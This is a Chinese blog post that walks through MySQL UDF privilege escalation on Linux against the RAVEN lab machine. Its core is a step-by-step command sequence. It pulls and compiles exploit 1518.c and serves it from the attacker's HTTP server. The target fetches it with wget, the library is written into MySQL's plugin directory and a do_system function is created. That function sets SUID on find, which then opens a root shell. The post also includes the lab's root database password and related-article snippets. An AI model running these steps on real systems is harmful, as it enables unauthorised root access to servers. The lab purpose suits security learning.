UDF提权(linux)

最新推荐文章于 2024-04-28 10:55:39 发布
最新推荐文章于 2024-04-28 10:55:39 发布
阅读量1.1k 收藏 3
点赞数
分类专栏: 笔记 文章标签: 数据库 mysql linux 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66299232/article/details/130823248
版权

实验环境:

RAVEN靶场:链接:百度网盘 请输入提取码

提取码:g6oz

攻击机:kali 2023.3    IP:192.168.126.142

关于UDF提权,需要满足的条件是

1.数据库管理员权限运行
#如果权限过低,无法执行系统命令,无法提权
2.数据库的版本信息不高于 5.5.6

查看满足条件

1》show global variables like '%secure_file_priv%';
或 show variables like '%secure%';
#这里需要是空值或者是plugin所在的目录,不能是null值
#secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入|导出,此时无法提权
#secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下,此时也无法提权
#secure_file_priv 的值没有具体值时,表示不对  mysqld 的导入|导出做限制,此时可提权
2》show variables like '%plugin%';
查看插件的位置,将动态连接文件导入到此目录

实操:

1.查询udf可利用的c程序,将1518.c保存到当前目录

searchsploit -m 1518.c

2.查看使用说明;大概就是将程序进行gcc编译,然后再登录mysql进行创建一个表,插入.so文件,创建自定义函数进行越权操作。

3.进行编译

gcc -g -c 1518.c
gcc -g -shared -o udf.so 1518.o -lc
-g  生成调试信息
-c  编译(二进制)
-shared 创建一个动态链接库,输入文件是源文件,汇编文件或者目标文件

-o  执行命令后的文件名
-lc  -l  库   -c  库名

python3 -m http.server

#用python开启http服务

4.将编译好的.so文件进行上传靶机,进行登录数据库

wget http://192.168.126.142:8000/udf.so

mysql -uroot -pR@v3nSecurity

show databases;

use mysql

5.查看udf提权的必要条件,看插件位置

show global variables like '%secure_file_priv%';

show variables like '%plugin%';

6.开始提权操作:

create table foo(line blob);

#创建一张临时表用来存放DLL/OS文件的16进制内容

insert into foo values(load_file('/tmp/udf.so'));

#插入udf.so文件(foo是占位符,没有任何意义)

select * from foo into dumpfile '/usr/lib/mysql/plugin/udf.so';

#利用dumpfile函数把文件导出

create function do_system returns integer soname 'udf.so';

#创建自定义函数do_system,类型是integer,别名(soname)文件名字

select * from mysql.func;

#查询函数是否创建成功

select do_system('chmod u+s /usr/bin/find');

#调用do_system函数来给find命令所有者的suid权限,使其可以执行root命令, 0代表执行成功 。

exit

7.执行命令,成功提权。

touch udf

find udf -exec "/bin/sh" \;

find udf -exec "id" \;

魏钦6666
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
Linux利用UDF库实现Mysql提权
09-10
根据MySQL函数族的可扩展机制,意味着用户可以自己建立包含有自定义函数的动态库来创建自定义函数,简称udf
udf提权PHP代码
10-30
udf提权PHP代码
mysql udf提权文件
02-01
mysql udf提权文件mysql udf提权文件
web安全:mysql提权总结篇
Candour_0的博客
01-15 370
web安全:mysql提权总结篇
mysql提权方式linux_Linux提权的几种常用方式
weixin_32124135的博客
02-28 411
本文转载自微信公众号「Bypass」,作者Bypass 。转载本文请联系Bypass公众号。在渗透测试过程中,提升权限是非常关键的一步,攻击者往往可以通过利用内核漏洞/权限配置不当/root权限运行的服务等方式寻找突破点,来达到提升权限的目的。1、内核漏洞提权提起内核漏洞提权就不得不提到脏牛漏洞(Dirty Cow),是存在时间最长且影响范围最广的漏洞之一。低权限用户可以利用该漏洞实现本地提权,...
MysqlUDF提权
yy
11-07 1万+
udf提权通过在mysql中添加自定义函数来执行系统命令。效果是从 mysql权限 —> 系统权限。提权限制条件挺多,如下先获取mysql的权限(连接上了mysql数据库Mysql版本大于5.1,我们需手动创建plugin文件夹,这是个棘手的问题mysql有写入文件的权限,即secure_file_priv的值为空。
udf提权
qq_43430261的博客
07-10 8301
udf提权 什么是udf udf = “user defined function”,即‘用户自定义函数’。是通过添加新函数,对MYSQL的功能进行扩充,性质就像使用本地MYSQL函数如abs()或concat()。udfmysql5.1以后的版本中,存在于’mysql/lib/plugin’目录下,文件后缀为’.dll’ 如何使用udf? 假设我的udf文件名为‘udf.dll’,存放在Mysql根目录(通过select @@basedir可知)的‘lib/plugin’目录下。在udf中,我定义了名为
Linux提权mysql UDF提权
waxcj的博客
12-16 1941
linux mysql数据库提权
linuxudf提权_udf提权
weixin_34862561的博客
01-14 981
0x00前言:udf提权是通过数据库来实现获取目标的管理员的shell,来达到从低权限提权到高权限0x01什么是udfudf(Userdefined function)是用户自定义函数在mysql中函数是什么,比如mysql中常见的sleep(),sum(),ascii()等都是函数udf就是为了让我们开发者能够自己写方便自己函数,它有3种返回值,这三种分别是STRING,INTEGER,REA...
udf提权原理研究-udf开发-linshao
qq_35349673的博客
02-20 3838
mysql通常是使用管理员权限进行配置,因此我们获取一个较低权限时可以通过mysql进行权限提升,本文侧重于制作utf扩展
udf 提权用的
05-28
udf 提权用的
udf提权_udf提权_udf.dll下载提权_mysql提权_ballsv6_提权_源码
10-04
mysql提权udf提权所需要的dll文件,有64位和32位
mysql 5.5 提权,mysql提权udf提权
weixin_32085599的博客
03-17 334
弄了两三天的UDF提权复现,遇到各种坑,也尝试了在实际渗透场景中的应用,所以总结了部分经验。此篇文章主要涉及mysql数据库udf提权的讲解、以及UDF提权可能涉及的问题。--目录结构--原理讲解0x00何谓UDF提权0x02 UDF提权步骤UDF(user defined function,即’用户自定义函数’),是mysql数据库的一个特性,允许用户写入自定义函数,对mysql功能进行扩充。...
MySQL提权
热门推荐
Grey的博客
05-12 3万+
一、Mysql提权必备条件1.服务器安装Mysql数据库利用Mysql提权的前提就是服务器安装了mysql数据库,且mysql的服务没有降权,Mysql数据库默认安装是以系统权限继承的,并且需要获取Mysql root账号密码。2.判断Mysql服务运行权限对于Mysql数据库服务运行权限有很多方法,我这里主要介绍三种,一种是通过查看系统账号,也即使用“net user”命令查看系统当前账号,如果...
MySql数据库提权学习总结
Haakure的博客
10-21 400
sqlmap\data\udf\mysql\windows\64目录下生成一个dll的文件lib_mysqludf_sys.dll,这个我们就可以直接拿来利用。在windows系统中,配置文件my.ini在 MySql 安装的根目录下,也有可能在隐藏文件夹“ProgramData”下。在Linux系统中,MySQL的配置文件位于/etc/mysql/my.cnf。secure_file_priv是用来限制mysql数据库导出的位置/目录。安装路径下的data目录存放的是数据库的数据信息。
渗透测试:MySQL数据库UDF提权详解
Bossfrank的博客
06-30 1670
本文介绍了渗透测试的常规提权方法——MySQL UDF提权。全面详解了UDFUDF提权原理与提权过程。以vulhub靶机pWnOS2.0为例,详解了提权的过程。读者可根据本文进行复现学习。
数据库提权--UDF提权MYSQL
qq_45936617的博客
10-07 273
数据库提权的目的是通过已有的数据库权限获得操作系统的权限。UDF(user-defined function)是MySQL的一个拓展接口,也可称之为用户自定义函数。用户通过自定义函数来实现MySQL中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用,通过添加命令执行函数可以执行系统命令, 从而进行提权
LINUX提权之第三方服务提权
ALLEN'Blog
12-14 638
总结了一下第三方服务器提权,相比于其他提权方法还是挺简单的,只需要找到对应第三方服务的漏洞即可尝试提权,当然我们也可以在MSF里找到对应的payload,仔细学习一下还是挺好理解的,本文就讲到这里,喜欢的话不妨一键三连。
报表控件Stimulsoft在JavaScript报告工具中的事件:查看器事件(上)
最新发布
励志做最业余的专业博主,控件产品可以私我~
04-28 790
在本文中,我们为JS报告工具中的查看器事件提供了全面的指南,包括它们的详细描述、参数列表等一系列详细内容。
udf提权 linux
06-10
要进行UDF提权,需要满足以下条件: 1. 系统中存在可写的UDF文件系统。 2. UDF文件系统是通过SUID或SGID权限设置的。 如果满足以上条件,可以通过以下步骤进行UDF提权: 1. 创建一个可执行的脚本文件,并将其保存...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值